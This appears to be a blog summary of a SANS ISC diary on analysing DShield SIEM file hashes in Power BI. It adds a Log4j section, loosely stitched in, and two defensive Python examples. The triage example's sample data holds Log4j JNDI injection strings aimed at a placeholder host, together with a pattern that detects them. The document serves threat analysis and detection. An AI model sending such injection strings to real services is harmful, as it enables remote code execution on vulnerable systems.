Analyzing File Hashes with Power BI from DShield SIEM Data


File hash analysis plays a crucial role in cybersecurity investigations, helping to identify malicious activity, track file modifications, and detect anomalies. This article explores how Power BI can be leveraged to analyze file hash data exported from the DShield SIEM system. By running queries in Elastic Discover, exporting relevant data, and visualizing trends in Power BI, we can uncover valuable insights into suspicious file activity and IP behavior over a 60-day period.

File Hash Analysis with Power BI

The author begins by querying Elastic Discover to retrieve file-related data from the past 60 days using the query:

`file.name : *`

The extracted data is then exported in CSV format and imported into Power BI for visualization.

Steps to Analyze Data in Power BI:

1. Data Extraction from Elastic Discover:

  • Run a query to collect relevant file information.
  • Export the results as a CSV file.

2. Importing Data into Power BI:

  • Open Power BI and select the CSV file.
  • Configure timestamps by splitting the date and time fields.
  • Remove duplicate timestamps to refine the dataset.

3. Building Visualizations:

  • Analyze IP activity, file names, and hash frequency.
  • Identify patterns in file uploads and changes over time.
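The same pipeline carried through in code, as an added Python example that is not part of the original diary: it reads a constructed CSV shaped like an Elastic Discover export (the column names and hash values are assumptions), splits each timestamp into date and time, drops duplicate rows, and derives the IP activity and hashes-per-filename views that the observations below are drawn from, including the multiple-hashes-per-name versus static-hash split.

```python
import csv
import io
from collections import Counter, defaultdict

# Constructed sample rows in the shape of an Elastic Discover CSV export.
# Column names and the hash values are placeholders/assumptions, not real data.
SAMPLE_CSV = """@timestamp,source.ip,file.name,file.hash.sha256
2025-01-12T03:14:07.000Z,87.120.113.231,clean.sh,hash-clean-1
2025-01-12T03:14:07.000Z,87.120.113.231,clean.sh,hash-clean-1
2025-01-25T05:00:00.000Z,87.120.113.231,clean.sh,hash-clean-1
2025-02-02T18:05:44.000Z,87.120.113.231,setup.sh,hash-setup-1
2025-02-05T10:00:00.000Z,87.120.113.231,setup.sh,hash-setup-1
2025-01-13T11:02:55.000Z,218.92.0.131,eyshcjdmzg,hash-eysh-1
2025-01-21T09:40:12.000Z,218.92.0.132,eyshcjdmzg,hash-eysh-2
2025-01-20T07:30:00.000Z,87.154.189.196,rktgw4Ir,hash-rkt-1
2025-01-31T22:11:09.000Z,79.7.197.84,P7TjdNkM,hash-p7t-1
"""

def load_events(csv_text):
    """Parse the export, split @timestamp into date and time, drop exact duplicate rows."""
    seen, events = set(), []
    for row in csv.DictReader(io.StringIO(csv_text)):
        key = (row["@timestamp"], row["source.ip"], row["file.name"], row["file.hash.sha256"])
        if key in seen:  # same timestamp, IP, name and hash: a duplicate record
            continue
        seen.add(key)
        date, time = row["@timestamp"].rstrip("Z").split("T")
        events.append({"date": date, "time": time, "ip": row["source.ip"],
                       "name": row["file.name"], "hash": row["file.hash.sha256"]})
    return events

def summarize(events):
    """Derive the views the diary builds in Power BI: IP activity and hashes per filename."""
    hashes, dates = defaultdict(set), defaultdict(set)
    names = Counter(e["name"] for e in events)
    for e in events:
        hashes[e["name"]].add(e["hash"])
        dates[e["ip"]].add(e["date"])
    ip_counts = Counter(e["ip"] for e in events)
    return {
        "top_ip": ip_counts.most_common(1)[0][0],
        "ip_activity": dict(ip_counts),
        "active_days_per_ip": {ip: len(d) for ip, d in dates.items()},
        "hashes_per_filename": {n: len(h) for n, h in hashes.items()},
        # same name, different content over time: the pattern flagged as suspicious
        "multi_hash_files": sorted(n for n, h in hashes.items() if len(h) > 1),
        # seen more than once but never changed (the clean.sh / setup.sh case)
        "static_files": sorted(n for n, h in hashes.items() if len(h) == 1 and names[n] > 1),
    }
```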

Key Observations from the Data

– IP Activity Analysis:

  • The most active IP in the dataset, 87.120.113[.]231, showed consistent activity during January and early February 2025.
  • It was associated with six different files linked to RedTail malware, with most filenames having multiple hashes.

– Filename Correlation:

  • A suspicious filename, eyshcjdmzg, was identified, matching a previously documented Linux Trojan in April 2024.
  • The IP addresses related to this filename had changed but still belonged to the same subnet (218.92.0[.]60 → 218.92.0[.]131 & 218.92.0[.]132).

– Strange Filename Uploads:

  • Filename rktgw4Ir appeared on January 20, 2025, uploaded by IP 87.154.189[.]196.
  • Another unusual filename, P7TjdNkM, was uploaded on January 31, 2025, by IP 79.7.197[.]84.
  • Checking these files against VirusTotal showed that one of them was an IRC bot, malware commonly used for remote control of compromised hosts.

Conclusion

By exporting large datasets and using Power BI to visualize trends, analysts can detect patterns that might otherwise go unnoticed. The ability to track file hash changes, correlate IP activity, and identify strange filenames enables more effective security monitoring and retrospective analysis.

What Undercode Says:

1. Why Power BI for Cybersecurity Analysis?

Power BI is primarily a business intelligence tool, but its ability to visualize and manipulate large datasets makes it valuable for cybersecurity investigations. Unlike traditional SIEM dashboards, Power BI allows analysts to:
– Build custom dashboards tailored to specific threat-hunting needs.
– Perform time-series analysis to track trends over extended periods.
– Correlate multiple data sources, making it easier to detect anomalies.

2. The Significance of File Hash Analysis

File hash tracking is essential for identifying malware variants and tracking modifications. This article highlights the importance of analyzing hashes alongside timestamps and IP sources to uncover relationships between file uploads and malicious activity.

  • Multiple Hashes per Filename: Malicious actors frequently modify file contents while keeping filenames consistent to evade detection.
  • Static Hashes: Files like clean.sh and setup.sh remained unchanged, suggesting they might be benign system files or intentionally left unmodified by attackers.

3. Identifying Anomalous IP Behavior

The dataset reveals how specific IPs repeatedly interact with suspicious files. This information is critical in threat intelligence because:
– Frequent IP activity may indicate automated attacks (e.g., botnets).
– IPs that change but stay within the same subnet suggest a persistent actor rotating through dynamically assigned addresses.

4. Retrospective Analysis and Its Benefits

By exporting SIEM data and analyzing it outside its original environment, analysts can:
– Discover overlooked threats that were missed in real-time alerts.
– Correlate with external threat intelligence sources like VirusTotal.
– Identify behavioral patterns that could indicate an advanced persistent threat (APT).

5. The Log4j Exploit Findings

The second part of the article discusses increased scanning activity against the VMware Hybrid Cloud Extension (HCX) API. What first looked like brute-force attempts against authentication endpoints turned out, on further investigation, to be Log4j exploitation attempts, with the malicious payload injected through the username field.

– Observed attack techniques:

  • Exploitation of Log4j vulnerability via manipulated authentication requests.
  • Use of randomized user agents to avoid signature-based detection.
  • Targeting login endpoints for potential credential theft and session hijacking.

– Key Takeaways:

  • The threat actor (IP 107.173.125.163) focused on login pages, suggesting credential theft or reconnaissance before launching further attacks.
  • The attack methodology aligns with previously observed Log4j exploitation tactics used to gain initial footholds in vulnerable systems.
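A triage routine that separates a plain brute-force pattern from Log4j lookup injection in the username field, as an added Python example not taken from the diary; the request records, the IPs (RFC 5737 documentation addresses) and the thresholds are constructed assumptions. It also counts distinct user agents per source, since randomized user agents were part of the observed behaviour.

```python
import re
from collections import defaultdict

# Constructed login requests as a SIEM might record them for an HCX-style login endpoint:
# (source_ip, user_agent, username). IPs are RFC 5737 documentation addresses, not real ones.
SAMPLE_REQUESTS = [
    ("203.0.113.10", "Mozilla/5.0 (X11; Linux x86_64)", "admin"),
    ("203.0.113.10", "curl/8.1", "${jndi:ldap://placeholder.invalid/a}"),
    ("203.0.113.10", "python-requests/2.31", "${jndi:ldap://placeholder.invalid/b}"),
    ("203.0.113.10", "Go-http-client/1.1", "${jndi:dns://placeholder.invalid/c}"),
    ("192.0.2.5", "ua-1", "admin"), ("192.0.2.5", "ua-2", "root"),
    ("192.0.2.5", "ua-3", "vmware"), ("192.0.2.5", "ua-1", "administrator"),
    ("192.0.2.5", "ua-2", "test"),
    ("198.51.100.7", "Mozilla/5.0 (Windows NT 10.0)", "operator"),
]

# Log4j lookup syntax, however it is nested or encoded afterwards, always opens with "${";
# a username never legitimately contains it, so this alone is a reliable trigger.
LOOKUP = re.compile(r"\$\{")

# Assumed thresholds for calling a burst of plain logins a brute-force suspect.
BRUTE_MIN_REQUESTS = 5
BRUTE_MIN_USER_AGENTS = 3

def classify(stats):
    """Lookup injection outranks the brute-force pattern it hides behind."""
    if stats["lookup_hits"]:
        return "log4j-exploit-attempt"
    if stats["requests"] >= BRUTE_MIN_REQUESTS and len(stats["user_agents"]) >= BRUTE_MIN_USER_AGENTS:
        return "brute-force-suspect"
    return "unremarkable"

def triage(requests):
    """Per source IP: request count, lookup hits, distinct user agents, and a verdict."""
    stats = defaultdict(lambda: {"requests": 0, "lookup_hits": 0, "user_agents": set()})
    for ip, user_agent, username in requests:
        s = stats[ip]
        s["requests"] += 1
        s["user_agents"].add(user_agent)
        if LOOKUP.search(username):
            s["lookup_hits"] += 1
    return {ip: {"requests": s["requests"], "lookup_hits": s["lookup_hits"],
                 "distinct_user_agents": len(s["user_agents"]), "verdict": classify(s)}
            for ip, s in stats.items()}
```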

Final Thoughts on Power BI in Cybersecurity

Power BI is not a replacement for SIEM tools, but it can complement them by providing deeper insights through advanced visualizations and retrospective analysis. By continuously monitoring file hashes, tracking suspicious IP activity, and correlating multiple data points, security teams can enhance their ability to detect and mitigate threats effectively.

Fact Checker Results:

  1. File Hash Analysis Enhances Threat Intelligence: Tracking hashes alongside timestamps and IP activity helps identify suspicious file behaviors.
  2. Retrospective Analysis Can Reveal Missed Threats: Exporting data for offline analysis enables deeper investigation into cyber threats.
  3. Log4j Exploitation Continues to Be a Major Threat: Attackers still leverage Log4j vulnerabilities in authentication endpoints to execute remote code.

By using Power BI to analyze SIEM data, security teams can stay ahead of emerging threats and improve their investigative capabilities.

References:

Reported By: https://isc.sans.edu/forums/diary/Microsoft